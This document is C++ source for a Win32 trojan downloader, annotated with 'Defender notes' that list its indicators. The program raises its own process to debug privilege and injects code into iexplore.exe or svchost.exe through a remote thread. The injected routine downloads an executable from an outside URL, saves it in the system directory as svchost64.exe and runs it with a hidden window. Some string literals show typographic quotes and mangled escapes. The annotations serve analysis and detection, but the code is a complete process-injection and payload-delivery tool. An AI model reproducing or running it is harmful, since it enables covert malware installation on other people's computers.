
C++ win32 downloader

#include "stdafx.h”
#include “stdio.h”
#include “string.h”
#include <windows.h>
#include <wininet.h>
#include “tlhelp32.h”
#pragma comment(lib,”wininet.lib“)

/***********************************************/
/*
 * Function-pointer types for every Win32 API the injected routine (ThreadProc)
 * calls. They are declared as types rather than linked directly because the
 * routine is copied into another process and resolves each API at run time
 * through GetProcAddress with the name strings carried in the Inject block.
 * Defender note: a binary that carries API names as plain strings and binds
 * them through GetModuleHandle/GetProcAddress/LoadLibrary instead of its
 * import table is the "dynamic API resolution" pattern; the exact names are
 * listed in InsertThread's Inject_stru initializer.
 */
typedef HINSTANCE (__stdcall *fun_ShellExecute)(HWND hWnd,          // prototype of ShellExecuteA (shell32)
                                                LPCTSTR lpOperation,
                                                LPCTSTR lpFile,
                                                LPCTSTR lpParameters,
                                                LPCTSTR lpDiretory,
                                                INT nShowCmd);

typedef int (__stdcall *fun_MessageBox)(HWND hWnd, LPCTSTR lpszText,   // prototype of MessageBoxA (user32); resolved but never called in ThreadProc
                                         LPCTSTR lpszCaption, UINT nType);

// define functions in kernel32.dll
typedef HANDLE (__stdcall *fun_CreateFile)( LPCTSTR, DWORD, DWORD, // prototype of CreateFileA
                                            LPSECURITY_ATTRIBUTES,
                                            DWORD, DWORD, HANDLE );
typedef BOOL (__stdcall *fun_WriteFile)( HANDLE, LPCVOID, DWORD,     // prototype of WriteFile
                                         LPDWORD, LPOVERLAPPED );
typedef BOOL (__stdcall *fun_CloseHandle)( HANDLE hObject );    // prototype of CloseHandle
typedef HMODULE (__stdcall *fun_GetModuleHandle)(LPCTSTR);    // prototype of GetModuleHandleA (bootstrap: passed to the target by value)
typedef FARPROC (__stdcall *fun_GetProcAddress)(HMODULE, LPCTSTR); // prototype of GetProcAddress (bootstrap: passed to the target by value)
typedef HINSTANCE (__stdcall *fun_LoadLibrary)(LPCTSTR);       // prototype of LoadLibraryA (bootstrap: passed to the target by value)

// define functions in wininet.dll
typedef HINTERNET (__stdcall *fun_InternetOpen)(IN LPCTSTR lpszAgent,  // prototype of InternetOpenA; lpszAgent becomes the HTTP User-Agent
                                                IN DWORD dwAccessType,
                                                IN LPCTSTR lpszProxyByName,
                                                IN LPCTSTR lpszProxyByPass,
                                                IN DWORD dwFlags);
typedef HINTERNET (__stdcall *fun_InternetOpenUrl)(IN HINTERNET hInternet,// prototype of InternetOpenUrlA
                                                   IN LPCTSTR lpszUrl,
                                                   IN LPCTSTR lpszHeaders OPTIONAL,
                                                   IN DWORD dwHeadersLength,
                                                   IN DWORD dwFlags,
                                                    IN DWORD dwContext);
typedef HINTERNET (__stdcall *fun_InternetReadFile)(IN HINTERNET hFile, // prototype of InternetReadFile; only tested for non-zero in ThreadProc's loop
                                                    IN LPVOID lpBuffer,
                                                    IN DWORD dwNumberOfBytesToRead,
                                                    OUT LPDWORD lpdwNumberOfBytesRead);
typedef HINTERNET (__stdcall *fun_InternetCloseHandle)(IN HINTERNET hInternet); // prototype of InternetCloseHandle

/*
 * Parameter block copied into the target process right after the code bytes
 * of ThreadProc (see InsertThread). It is the only data the injected routine
 * can rely on, so it carries the three bootstrap API pointers plus every
 * module name, export name, HTTP header, User-Agent, URL and output path as
 * inline character arrays (no pointers into this image's address space).
 * Defender note: the string contents assigned in InsertThread are the
 * host-based indicators for this sample; the block itself lands in the
 * same RWX allocation as the code, so memory scans that find these strings
 * adjacent to executable bytes in a non-image region are a good signal.
 */
typedef struct tag_Inject             // define a structure to copy to distance process
                        {
                        fun_GetModuleHandle GetModuleHandle;   // bootstrap: GetModuleHandleA, valid in the target because kernel32 is mapped at the same base
                        fun_GetProcAddress GetProcAddress;     // bootstrap: GetProcAddress
                        fun_LoadLibrary LoadLibrary;           // bootstrap: LoadLibraryA
                        char szKernel[32];                     // "kernel32.dll"
                        char szUser[32];                       // "user32.dll"
                        char szNet[32];                        // "wininet.dll"
                        char szShell[32];                      // "shell32.dll"
                        char szMessageBox[32];                 // "MessageBoxA"
                        char szInternetOpen[32];               // "InternetOpenA"
                        char szInternetOpenUrl[MAX_PATH];      // "InternetOpenUrlA"
                        char szInternetReadFile[128];          // "InternetReadFile"
                        char szInternetCloseHandle[32];        // "InternetCloseHandle"
                        char szCreateFile[32];                 // "CreateFileA"
                        char szWriteFile[32];                  // "WriteFile"
                        char szCloseHandle[32];                // "CloseHandle"
                        char szShellExecute[32];               // "ShellExecuteA"
                        char szHeader[16];                     // extra HTTP request header passed to InternetOpenUrl
                        char szInterFlag[32];                  // User-Agent string passed to InternetOpen
                        char szOpenFlag[10];                   // set to "wba" in InsertThread; not read by ThreadProc
                        char szUrlAddr[MAX_PATH];              // download URL
                        char szUrlAddr1[MAX_PATH];             // initialised empty; not read by ThreadProc
                        char szFilePath[MAX_PATH];             // local path the download is written to and then executed from
                        char szFilePath1[MAX_PATH];            // never assigned or read in this file
                        }Inject;

/***************************************/

/************************************************/
/*
 * Payload routine executed inside another process. InsertThread copies the
 * bytes from the start of ThreadProc up to AddressFlag into a remote RWX
 * allocation and starts them with CreateRemoteThread, passing a pointer to
 * the copied Inject block as the thread parameter. Because the bytes run in
 * a foreign address space, nothing here may reference this image's globals
 * or import table; every API is bound at run time via the three bootstrap
 * pointers and the name strings in *Inject_info.
 *
 * Observable behaviour, in order: load/locate kernel32, user32, wininet and
 * shell32; resolve the WinINet, file and shell APIs; open
 * Inject_info->szUrlAddr with the User-Agent Inject_info->szInterFlag; write
 * the response body to Inject_info->szFilePath (CREATE_ALWAYS); close the
 * handles; launch that file with ShellExecute(..., SW_HIDE).
 *
 * Returns FALSE if any module, the WinINet session, the URL handle or the
 * output file could not be obtained; TRUE after ShellExecute has been called
 * (the result of ShellExecute itself is not checked).
 *
 * Defender notes: a thread whose start address lies in a private
 * PAGE_EXECUTE_READWRITE region not backed by any module, followed by
 * InternetOpenA -> InternetOpenUrlA -> InternetReadFile -> CreateFileA /
 * WriteFile -> ShellExecuteA from the host process (iexplore.exe or
 * svchost.exe, per Get_ProcID) is the behavioural signature. The
 * User-Agent, URL and drop path come from InsertThread's initializer.
 *
 * NOTE(review): this routine's layout is load-bearing — its length is
 * computed as (AddressFlag - ThreadProc) in InsertThread, and it is copied
 * byte-for-byte. Annotations only; the code is left untouched.
 */
static BOOL ThreadProc(Inject* Inject_info)
{
    HMODULE hKernel32, hUser32, hWininet, hShell32;  // module handles resolved inside the target

    fun_InternetOpen j_InternetOpen;           // function pointers bound below via GetProcAddress
    fun_InternetOpenUrl j_InternetOpenUrl;
    fun_InternetReadFile j_InternetReadFile;
    fun_InternetCloseHandle j_InternetCloseHandle;
    fun_CreateFile j_CreateFile;
    fun_WriteFile j_WriteFile;
    fun_CloseHandle j_CloseHandle;
    fun_MessageBox j_MessageBox;
    fun_ShellExecute j_ShellExecute;

    hKernel32 = Inject_info->GetModuleHandle(Inject_info->szKernel);  // use the copy already mapped in the target, if any
    if (NULL == hKernel32)                              // not mapped
    {
        hKernel32 = Inject_info->LoadLibrary(Inject_info->szKernel);          // load it explicitly
        if (NULL == hKernel32)                                      // load failed
        {
            return FALSE;
        }
    }

    hUser32 = Inject_info->GetModuleHandle(Inject_info->szUser);   // same get-or-load pattern for user32
    if (NULL == hUser32)
    {
        hUser32 = Inject_info->LoadLibrary(Inject_info->szUser);
        if (NULL == hUser32)
        {
            return FALSE;
        }
    }

    hWininet = Inject_info->GetModuleHandle(Inject_info->szNet);   // wininet: loading it into a host that does not use WinINet is itself a signal
    if (NULL == hWininet)
    {
        hWininet = Inject_info->LoadLibrary(Inject_info->szNet);
        if (NULL == hWininet)
        {
            return FALSE;
        }
    }

    hShell32 = Inject_info->GetModuleHandle(Inject_info->szShell); // shell32, needed only for ShellExecute at the end
    if (NULL == hShell32)
    {
        hShell32 = Inject_info->LoadLibrary(Inject_info->szShell);
        if (NULL == hShell32)
        {
            return FALSE;
        }
    }

    // Bind each API by name. None of the GetProcAddress results is checked for NULL before use.
    j_InternetOpen = (fun_InternetOpen)Inject_info->GetProcAddress(hWininet,                    // bind InternetOpen
                                                                    Inject_info->szInternetOpen);
    j_InternetOpenUrl = (fun_InternetOpenUrl)Inject_info->GetProcAddress(hWininet,              // bind InternetOpenUrl
                                                                         Inject_info->szInternetOpenUrl);
    j_InternetReadFile = (fun_InternetReadFile)Inject_info->GetProcAddress(hWininet,            // bind InternetReadFile
                                                                            Inject_info->szInternetReadFile);
    j_InternetCloseHandle = (fun_InternetCloseHandle)Inject_info->GetProcAddress(hWininet,      // bind InternetCloseHandle
                                                                                Inject_info->szInternetCloseHandle);

    j_CreateFile = (fun_CreateFile)Inject_info->GetProcAddress(hKernel32,                       // bind CreateFile
                                                                Inject_info->szCreateFile);
    j_WriteFile = (fun_WriteFile)Inject_info->GetProcAddress(hKernel32,                         // bind WriteFile
                                                                Inject_info->szWriteFile);
    j_CloseHandle = (fun_CloseHandle)Inject_info->GetProcAddress(hKernel32,                     // bind CloseHandle
                                                                Inject_info->szCloseHandle);
    j_MessageBox = (fun_MessageBox)Inject_info->GetProcAddress(hUser32,                         // bind MessageBox (resolved, never called)
                                                                Inject_info->szMessageBox);
    j_ShellExecute = (fun_ShellExecute)Inject_info->GetProcAddress(hShell32,                    // bind ShellExecute
                                                                    Inject_info->szShellExecute);
    HINTERNET hNet, hFile;                                                                      // WinINet session handle and URL handle

    hNet = j_InternetOpen(Inject_info->szInterFlag, INTERNET_OPEN_TYPE_PRECONFIG,
                            NULL, NULL, 0);                                                     // open a WinINet session; szInterFlag is sent as the User-Agent, proxy taken from the host's preconfigured settings
    if (NULL == hNet)                                                                           // session failed
    {
        return FALSE;
    }

    hFile = j_InternetOpenUrl(hNet, Inject_info->szUrlAddr, Inject_info->szHeader,
                                strlen(Inject_info->szHeader),
                                INTERNET_FLAG_DONT_CACHE|INTERNET_FLAG_RELOAD, 0);              // fetch the URL, bypassing the cache; szHeader is appended to the request
    if (NULL == hFile)                                                                          // request failed
    {
        return FALSE;
    }

    char buff[1024];                                                                            // transfer buffer
    DWORD dwRead,                                                                               // bytes returned by each InternetReadFile
            dwWritten = NULL;                                                                   // bytes written by WriteFile

    HANDLE hCreateFile = j_CreateFile(Inject_info->szFilePath, GENERIC_READ|GENERIC_WRITE,      // create/truncate the drop file
                                        0, NULL, CREATE_ALWAYS, 0 ,NULL);
    if (NULL == hCreateFile)                                                                    // treated as failure (the WinINet handles are not closed on this path)
    {
        return FALSE;
    }
    while(j_InternetReadFile(hFile, buff, 1023, &dwRead))                                       // read up to 1023 bytes at a time until the read call fails
    {
        if (0 == dwRead)                 // zero bytes means end of response
            break;
        j_WriteFile(hCreateFile, buff, dwRead, &dwWritten, NULL);  // append the chunk to the drop file; WriteFile's result is ignored

    }
    j_InternetCloseHandle(hNet);                             // close the session handle
    j_InternetCloseHandle(hFile);                           // close the URL handle
    j_CloseHandle(hCreateFile);                            // close the drop file

    j_ShellExecute(NULL, NULL, Inject_info->szFilePath, NULL, NULL, SW_HIDE); // execute the downloaded file with a hidden window; the original comment calls it a trojan

    return TRUE;
}

/*
 * End-of-code marker. Its address is subtracted from ThreadProc's address in
 * InsertThread to obtain the number of bytes to copy into the target process,
 * so it must stay empty and be emitted immediately after ThreadProc. Whether
 * the compiler actually lays the two functions out contiguously in that
 * order is not guaranteed by the language and cannot be verified from this
 * file.
 */
static void AddressFlag(void)
{
}
/****************************************************************************************************************/

/***************************************************************************************/
/*                       提升目前程序的權限到 DEBUG                                    */
/***************************************************************************************/

/****************************************************************************************************************/
/*
 * Enables SeDebugPrivilege in the current process token. It is called from
 * Get_ProcID before the PID is handed to OpenProcess(PROCESS_ALL_ACCESS) in
 * InsertThread. The return values of LookupPrivilegeValue, OpenProcessToken
 * and AdjustTokenPrivileges are all ignored; success is inferred solely from
 * GetLastError() == ERROR_SUCCESS after AdjustTokenPrivileges, and the token
 * handle is never closed.
 *
 * Defender note: SeDebugPrivilege being enabled by a binary that is not a
 * debugger or administrative tool is a common precursor to cross-process
 * memory writes and remote thread creation (both present in InsertThread).
 */
BOOL ImprovePrivilege()                                         // raise this process's privilege
{
    HANDLE hToken = NULL ;                              // process token handle
    BOOL bRet = FALSE;                                      // result
    TOKEN_PRIVILEGES tp = {1, {0, 0, SE_PRIVILEGE_ENABLED}};   // one privilege; the LUID is filled in below, attribute = enabled

    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);   // look up the LUID for SeDebugPrivilege
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken); // open our own token for adjustment
    AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof tp, 0, 0);    // request SeDebugPrivilege
    bRet = (GetLastError() == ERROR_SUCCESS);                // only signal checked: last error after the adjustment
    return bRet;
}
/****************************************************************************************************************/

/***************************************************************************************/
/*                       得到IExplore.exe的程序ID                                      */
/***************************************************************************************/

/****************************************************************************************************************/
/*
 * Chooses the host process for injection. Walks a Toolhelp process snapshot
 * and returns the PID of the first process whose executable name, lowered
 * with strlwr, equals "iexplore.exe" or "svchost.exe". Returns 0 when no such
 * process exists, and FALSE (also 0) when ImprovePrivilege fails; InsertThread
 * does not distinguish these from a real PID before calling OpenProcess.
 *
 * Defender note: the combination "enable SeDebugPrivilege, enumerate
 * processes, select iexplore.exe/svchost.exe, open it with PROCESS_ALL_ACCESS"
 * is the host-selection stage of this injector; svchost.exe is a common
 * target because network activity from it draws less attention.
 *
 * Observations (left as-is): strProc is allocated with new[] and never
 * released; hSnap is only closed on the not-found path and is not checked
 * against INVALID_HANDLE_VALUE; the ImprovePrivilege check happens after the
 * snapshot is taken.
 */
DWORD Get_ProcID()
{
    char* strProc = new char[256];
    HANDLE hSnap;                                                       // snapshot handle
    PROCESSENTRY32 ppe;                                                 // per-process entry

    hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);            // snapshot of all processes

    if (!ImprovePrivilege())                                            // enable SeDebugPrivilege first
    {
        return FALSE;
    }
    ppe.dwSize = sizeof( PROCESSENTRY32 );                              // required before Process32First
    Process32First( hSnap, &ppe );                                      // first entry; result not checked
    while ( 1 )          // scan entries for one of the two target image names
    {
        strcpy(strProc, ppe.szExeFile); // copy the image name (unbounded copy into a 256-byte buffer)
        strProc = strlwr(strProc);  // lower-case in place
        if (0 == strcmp(strProc, “iexplore.exe“))// Internet Explorer?
        {
            return ppe.th32ProcessID;
        }
        else if (0 == strcmp(strProc, “svchost.exe“))// generic service host?
        {
            return ppe.th32ProcessID;
        }
        if ( !Process32Next( hSnap, &ppe ))
        {
            break;
        }
    }
    CloseHandle( hSnap );
    return 0;
}
/*************************************/

/*************************************************************************************/
/*      将 ThreadProc 函數以插入線程的形式在浏覽器程序中運作                         */
/*************************************/

/*************************************/
/*
 * Injects ThreadProc into the process chosen by Get_ProcID. Steps:
 *   1. Fill an Inject block with the module/export names, HTTP header,
 *      User-Agent, download URL and drop path (system directory + the
 *      "svchost64.exe" name, chosen to resemble the real svchost.exe).
 *   2. Resolve GetModuleHandleA / GetProcAddress / LoadLibraryA from the
 *      local kernel32 and store them in the block as bootstrap pointers.
 *   3. OpenProcess(PROCESS_ALL_ACCESS) on the target PID.
 *   4. VirtualAllocEx a PAGE_EXECUTE_READWRITE region sized for the code
 *      plus the block, WriteProcessMemory the code bytes, then the block at
 *      a 4-byte-aligned offset after the code.
 *   5. CreateRemoteThread with the region's base as the start address and
 *      the block's remote address as the parameter.
 * Returns FALSE on the first failing step (hProc is never closed on any
 * path); TRUE once the remote thread has been created.
 *
 * Defender notes: this is textbook process injection — OpenProcess with
 * full access, VirtualAllocEx(RWX), WriteProcessMemory, CreateRemoteThread
 * with a start address in a non-image region. Host indicators as they appear
 * on this page: drop path under the system directory named svchost64.exe,
 * URL http://www.hf-hx.com/music/x.exe, User-Agent "RookIE/1.0". The quotes
 * in these literals are typographic and the path / CRLF escapes show as
 * forward slashes, which looks like a rendering artifact of the page, so
 * treat the exact bytes as approximate.
 */
BOOL InsertThread()
{
    char szSystemRoot[MAX_PATH];
    PDWORD pdwRemote = NULL;  // base of the remote allocation (code goes first)
    const int iCodeSize = ((LPBYTE)AddressFlag - (LPBYTE)ThreadProc);// code length = distance between the two functions as laid out by the compiler

    Inject *InjectRemote = NULL; // remote address of the copied Inject block
    DWORD dwThread = NULL,
        dwOut = NULL,
         dwProc = Get_ProcID();   // target PID; 0 on failure is not checked here
    HANDLE hProc = NULL;
    const DWORD cbMemSize = iCodeSize + sizeof(Inject) + 3; // code + block + slack for alignment

    Inject Inject_stru = {NULL, NULL, NULL,                 // bootstrap pointers filled in below
                            “kernel32.dll“,
                            “user32.dll“,
                            “wininet.dll“,
                            “shell32.dll“,
                            “MessageBoxA“,
                            “InternetOpenA“,
                            “InternetOpenUrlA“,
                            “InternetReadFile“,
                            “InternetCloseHandle“,
                            “CreateFileA“,
                            “WriteFile“,
                            “CloseHandle“,
                            “ShellExecuteA“,
                            “Accept: */*/r/n/r/n“,                  // extra request header (szHeader)
                            “RookIE/1.0“,                           // User-Agent (szInterFlag)
                            “wba“,                                  // szOpenFlag, unused by ThreadProc
                            “http://www.hf-hx.com/music/x.exe“,     // download URL (szUrlAddr)
                            “”};  // szUrlAddr1 empty; szFilePath set below

    GetSystemDirectory(szSystemRoot, sizeof(szSystemRoot)); // e.g. the system32 directory; result not checked
    strcat(szSystemRoot, “//svchost64.exe“); // drop file name, chosen to look like svchost.exe
    strcpy(Inject_stru.szFilePath, szSystemRoot); // hand the drop path to the injected routine

    HMODULE hKernel32 = GetModuleHandle(”kernel32.dll“);
    Inject_stru.GetModuleHandle = (fun_GetModuleHandle)GetProcAddress(hKernel32, “GetModuleHandleA“);// local address; reused in the target on the assumption kernel32 shares its base
    Inject_stru.GetProcAddress = (fun_GetProcAddress)GetProcAddress(hKernel32, “GetProcAddress“); // same assumption
    Inject_stru.LoadLibrary = (fun_LoadLibrary)GetProcAddress(hKernel32, “LoadLibraryA“);// same assumption

    hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProc);     // full-access handle to the host process
    if (NULL == hProc)
    {
        return FALSE;
    }

    pdwRemote = (PDWORD)VirtualAllocEx(hProc, NULL, cbMemSize, MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); // RWX region in the target
    if (NULL == pdwRemote)
    {
        return FALSE;
    }

    if (!WriteProcessMemory(hProc, pdwRemote, (LPVOID)ThreadProc, cbMemSize, &dwOut)) // copy cbMemSize bytes starting at ThreadProc (more than iCodeSize: the tail is whatever follows in this image)
    {
        return FALSE;
    }

    InjectRemote = (Inject*)(((LPBYTE)pdwRemote) + ((iCodeSize + 4) & ~3));   // block placed after the code, rounded up to a 4-byte boundary
    if (!WriteProcessMemory(hProc, InjectRemote, &Inject_stru, sizeof(Inject_stru), &dwOut))  // overwrite that tail with the parameter block
    {
        return FALSE;
    }

    if (NULL == CreateRemoteThread(hProc, NULL, 65535, (LPTHREAD_START_ROUTINE)pdwRemote, InjectRemote, 0, NULL)) // start ThreadProc's copy with the block as its argument; thread handle is discarded
    {
        return FALSE;
    }

    return TRUE;
}
/******************************************/

/*
 * Entry point. Performs the injection once and exits; the result of
 * InsertThread is ignored and no window is created, so the process itself
 * is short-lived — the download and execution happen in the host process
 * chosen by Get_ProcID. All four parameters are unused.
 */
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
    InsertThread();
    return 0;
}